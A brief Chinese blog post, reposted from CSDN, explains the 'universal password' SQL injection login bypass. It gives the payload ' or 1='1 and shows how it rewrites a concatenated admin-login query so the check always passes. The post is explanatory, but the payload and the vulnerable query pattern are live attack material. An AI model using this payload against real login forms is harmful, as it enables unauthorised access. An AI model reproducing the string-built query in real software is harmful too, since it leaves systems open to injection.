SQL万能密码:' or 1='1

select name,pass from tbAdmin where name='admin' and pass='123456'



输入用户名:' or 1='1


SQL变成下面这个样子:


select name,pass from tbAdmin where name='' or 1='1' and pass='123456'


1='1' 永远为真,所以就验证通过了。。。

 

来源: 

https://blog.csdn.net/friendan/article/details/52215980

posted @ 2018-08-03 09:29  凯宾斯基  阅读(12715)  评论(0编辑  收藏  举报